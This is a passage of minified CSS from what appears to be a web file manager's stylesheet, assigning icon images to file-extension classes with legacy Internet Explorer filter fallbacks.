\9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/zip_all.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/zip_all.png?ver=3.30',sizingMethod='scale');}.x-exe,.x-bin,.x-class,.x-a,.x-so{background-image:url("../../../images/file_icon/icon_file/exe.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/exe.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/exe.png?ver=3.30',sizingMethod='scale');}.x-ttf,.x-otf,.x-eot,.x-woff,.x-tiff,.x-ttc{background-image:url("../../../images/file_icon/icon_file/font.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/font.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/font.png?ver=3.30',sizingMethod='scale');}.x-bat,.x-cmd,.x-sh,.x-bash,.x-bashrc{background-image:url("../../../images/file_icon/icon_file/cmd.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cmd.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cmd.png?ver=3.30',sizingMethod='scale');}.x-ini,.x-inf,.x-conf,.x-meta,.x-gitignore,.x-plist,.x-htaccess,.x-localized,.x-xcscheme,.x-storyboard,.x-xib,.x-strings,.x-pbxproj{background-image:url("../../../images/file_icon/icon_file/ini.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ini.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ini.png?ver=3.30',sizingMethod='scale');}.x-md,.x-markdown{background-image:url("../../../images/file_icon/icon_file/md.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/md.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/md.png?ver=3.30',sizingMethod='scale');}.x-file{background-image:url("../../../images/file_icon/icon_file/file.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/file.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/file.png?ver=3.30',sizingMethod='scale');}.x-accdb{background-image:url("../../../images/file_icon/icon_file/accdb.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/accdb.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/accdb.png?ver=3.30',sizingMethod='scale');}.x-7z{background-image:url("../../../images/file_icon/icon_file/7z.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/7z.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/7z.png?ver=3.30',sizingMethod='scale');}.x-ai{background-image:url("../../../images/file_icon/icon_file/ai.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ai.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ai.png?ver=3.30',sizingMethod='scale');}.x-air{background-image:url("../../../images/file_icon/icon_file/air.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/air.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/air.png?ver=3.30',sizingMethod='scale');}.x-arj{background-image:url("../../../images/file_icon/icon_file/arj.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/arj.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/arj.png?ver=3.30',sizingMethod='scale');}.x-apk{background-image:url("../../../images/file_icon/icon_file/apk.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/apk.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/apk.png?ver=3.30',sizingMethod='scale');}.x-as{background-image:url("../../../images/file_icon/icon_file/as.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/as.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/as.png?ver=3.30',sizingMethod='scale');}.x-ascx{background-image:url("../../../images/file_icon/icon_file/ascx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ascx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ascx.png?ver=3.30',sizingMethod='scale');}.x-ashx{background-image:url("../../../images/file_icon/icon_file/ashx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ashx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ashx.png?ver=3.30',sizingMethod='scale');}.x-asmx{background-image:url("../../../images/file_icon/icon_file/asmx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/asmx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/asmx.png?ver=3.30',sizingMethod='scale');}.x-aspx{background-image:url("../../../images/file_icon/icon_file/aspx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/aspx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/aspx.png?ver=3.30',sizingMethod='scale');}.x-bz2{background-image:url("../../../images/file_icon/icon_file/bz2.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/bz2.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/bz2.png?ver=3.30',sizingMethod='scale');}.x-cdr{background-image:url("../../../images/file_icon/icon_file/cdr.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cdr.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cdr.png?ver=3.30',sizingMethod='scale');}.x-cer{background-image:url("../../../images/file_icon/icon_file/cer.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cer.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cer.png?ver=3.30',sizingMethod='scale');}.x-chm{background-image:url("../../../images/file_icon/icon_file/chm.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/chm.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/chm.png?ver=3.30',sizingMethod='scale');}.x-cmd{background-image:url("../../../images/file_icon/icon_file/cmd.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cmd.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cmd.png?ver=3.30',sizingMethod='scale');}.x-c{background-image:url("../../../images/file_icon/icon_file/c.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/c.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/c.png?ver=3.30',sizingMethod='scale');}.x-cpp{background-image:url("../../../images/file_icon/icon_file/cpp.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cpp.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cpp.png?ver=3.30',sizingMethod='scale');}.x-cs{background-image:url("../../../images/file_icon/icon_file/cs.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cs.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cs.png?ver=3.30',sizingMethod='scale');}.x-cshtml{background-image:url("../../../images/file_icon/icon_file/cshtml.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cshtml.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cshtml.png?ver=3.30',sizingMethod='scale');}.x-csproj{background-image:url("../../../images/file_icon/icon_file/csproj.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/csproj.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/csproj.png?ver=3.30',sizingMethod='scale');}.x-css{background-image:url("../../../images/file_icon/icon_file/css.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/css.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/css.png?ver=3.30',sizingMethod='scale');}.x-csv{background-image:url("../../../images/file_icon/icon_file/csv.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/csv.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/csv.png?ver=3.30',sizingMethod='scale');}.x-djvu{background-image:url("../../../images/file_icon/icon_file/djvu.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/djvu.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/djvu.png?ver=3.30',sizingMethod='scale');}.x-dll{background-image:url("../../../images/file_icon/icon_file/dll.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dll.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dll.png?ver=3.30',sizingMethod='scale');}.x-dng{background-image:url("../../../images/file_icon/icon_file/dng.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dng.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dng.png?ver=3.30',sizingMethod='scale');}.x-dmg,.x-img{background-image:url("../../../images/file_icon/icon_file/dmg.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dmg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dmg.png?ver=3.30',sizingMethod='scale');}.x-doc,.x-wps{background-image:url("../../../images/file_icon/icon_file/doc.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/doc.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/doc.png?ver=3.30',sizingMethod='scale');}.x-docm{background-image:url("../../../images/file_icon/icon_file/docm.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/docm.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/docm.png?ver=3.30',sizingMethod='scale');}.x-docx{background-image:url("../../../images/file_icon/icon_file/docx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/docx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/docx.png?ver=3.30',sizingMethod='scale');}.x-dot{background-image:url("../../../images/file_icon/icon_file/dot.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dot.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dot.png?ver=3.30',sizingMethod='scale');}.x-dotm{background-image:url("../../../images/file_icon/icon_file/dotm.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dotm.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dotm.png?ver=3.30',sizingMethod='scale');}.x-dotx{background-image:url("../../../images/file_icon/icon_file/dotx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dotx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dotx.png?ver=3.30',sizingMethod='scale');}.x-dtd{background-image:url("../../../images/file_icon/icon_file/dtd.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dtd.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dtd.png?ver=3.30',sizingMethod='scale');}.x-eps{background-image:url("../../../images/file_icon/icon_file/eps.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/eps.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/eps.png?ver=3.30',sizingMethod='scale');}.x-epub{background-image:url("../../../images/file_icon/icon_file/epub.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/epub.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/epub.png?ver=3.30',sizingMethod='scale');}.x-exe{background-image:url("../../../images/file_icon/icon_file/exe.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/exe.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/exe.png?ver=3.30',sizingMethod='scale');}.x-f{background-image:url("../../../images/file_icon/icon_file/f.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/f.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/f.png?ver=3.30',sizingMethod='scale');}.x-file{background-image:url("../../../images/file_icon/icon_file/file.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/file.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/file.png?ver=3.30',sizingMethod='scale');}.x-fla{background-image:url("../../../images/file_icon/icon_file/fla.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/fla.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/fla.png?ver=3.30',sizingMethod='scale');}.x-font{background-image:url("../../../images/file_icon/icon_file/font.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/font.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/font.png?ver=3.30',sizingMethod='scale');}.x-gif{background-image:url("../../../images/file_icon/icon_file/gif.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/gif.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/gif.png?ver=3.30',sizingMethod='scale');}.x-gz{background-image:url("../../../images/file_icon/icon_file/gz.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/gz.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/gz.png?ver=3.30',sizingMethod='scale');}.x-h{background-image:url("../../../images/file_icon/icon_file/h.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/h.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/h.png?ver=3.30',sizingMethod='scale');}.x-hdr{background-image:url("../../../images/file_icon/icon_file/hdr.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/hdr.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/hdr.png?ver=3.30',sizingMethod='scale');}.x-hlp{background-image:url("../../../images/file_icon/icon_file/hlp.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/hlp.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/hlp.png?ver=3.30',sizingMethod='scale');}.x-html{background-image:url("../../../images/file_icon/icon_file/html.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/html.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/html.png?ver=3.30',sizingMethod='scale');}.x-indd{background-image:url("../../../images/file_icon/icon_file/indd.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/indd.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/indd.png?ver=3.30',sizingMethod='scale');}.x-ini{background-image:url("../../../images/file_icon/icon_file/ini.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ini.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ini.png?ver=3.30',sizingMethod='scale');}.x-ipa{background-image:url("../../../images/file_icon/icon_file/ipa.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ipa.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ipa.png?ver=3.30',sizingMethod='scale');}.x-jar{background-image:url("../../../images/file_icon/icon_file/jar.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/jar.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/jar.png?ver=3.30',sizingMethod='scale');}.x-java{background-image:url("../../../images/file_icon/icon_file/java.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/java.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/java.png?ver=3.30',sizingMethod='scale');}.x-jpg{background-image:url("../../../images/file_icon/icon_file/jpg.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/jpg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/jpg.png?ver=3.30',sizingMethod='scale');}.x-js{background-image:url("../../../images/file_icon/icon_file/js.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/js.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/js.png?ver=3.30',sizingMethod='scale');}.x-json{background-image:url("../../../images/file_icon/icon_file/json.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/json.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/json.png?ver=3.30',sizingMethod='scale');}.x-key{background-image:url("../../../images/file_icon/icon_file/key.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/key.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/key.png?ver=3.30',sizingMethod='scale');}.x-ldf{background-image:url("../../../images/file_icon/icon_file/ldf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ldf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ldf.png?ver=3.30',sizingMethod='scale');}.x-lnk{background-image:url("../../../images/file_icon/icon_file/lnk.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/lnk.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/lnk.png?ver=3.30',sizingMethod='scale');}.x-makefile{background-image:url("../../../images/file_icon/icon_file/makefile.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/makefile.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/makefile.png?ver=3.30',sizingMethod='scale');}.x-mdb{background-image:url("../../../images/file_icon/icon_file/mdb.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/mdb.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/mdb.png?ver=3.30',sizingMethod='scale');}.x-mdf{background-image:url("../../../images/file_icon/icon_file/mdf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/mdf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/mdf.png?ver=3.30',sizingMethod='scale');}.x-mht{background-image:url("../../../images/file_icon/icon_file/mht.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/mht.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/mht.png?ver=3.30',sizingMethod='scale');}.x-midi{background-image:url("../../../images/file_icon/icon_file/midi.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/midi.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/midi.png?ver=3.30',sizingMethod='scale');}.x-mpp{background-image:url("../../../images/file_icon/icon_file/mpp.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/mpp.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/mpp.png?ver=3.30',sizingMethod='scale');}.x-mpt{background-image:url("../../../images/file_icon/icon_file/mpt.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/mpt.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/mpt.png?ver=3.30',sizingMethod='scale');}.x-msg{background-image:url("../../../images/file_icon/icon_file/msg.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/msg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/msg.png?ver=3.30',sizingMethod='scale');}.x-msi{background-image:url("../../../images/file_icon/icon_file/msi.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/msi.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/msi.png?ver=3.30',sizingMethod='scale');}.x-numbers{background-image:url("../../../images/file_icon/icon_file/numbers.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/numbers.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/numbers.png?ver=3.30',sizingMethod='scale');}.x-odp{background-image:url("../../../images/file_icon/icon_file/odp.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/odp.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/odp.png?ver=3.30',sizingMethod='scale');}.x-ods{background-image:url("../../../images/file_icon/icon_file/ods.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ods.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ods.png?ver=3.30',sizingMethod='scale');}.x-odt{background-image:url("../../../images/file_icon/icon_file/odt.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/odt.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/odt.png?ver=3.30',sizingMethod='scale');}.x-oexe{background-image:url("../../../images/file_icon/icon_file/oexe.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/oexe.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/oexe.png?ver=3.30',sizingMethod='scale');}.x-oexe2{background-image:url("../../../images/file_icon/icon_file/oexe2.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/oexe2.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/oexe2.png?ver=3.30',sizingMethod='scale');}.x-ogg{background-image:url("../../../images/file_icon/icon_file/ogg.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ogg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ogg.png?ver=3.30',sizingMethod='scale');}.x-pages{background-image:url("../../../images/file_icon/icon_file/pages.png");background-image:none 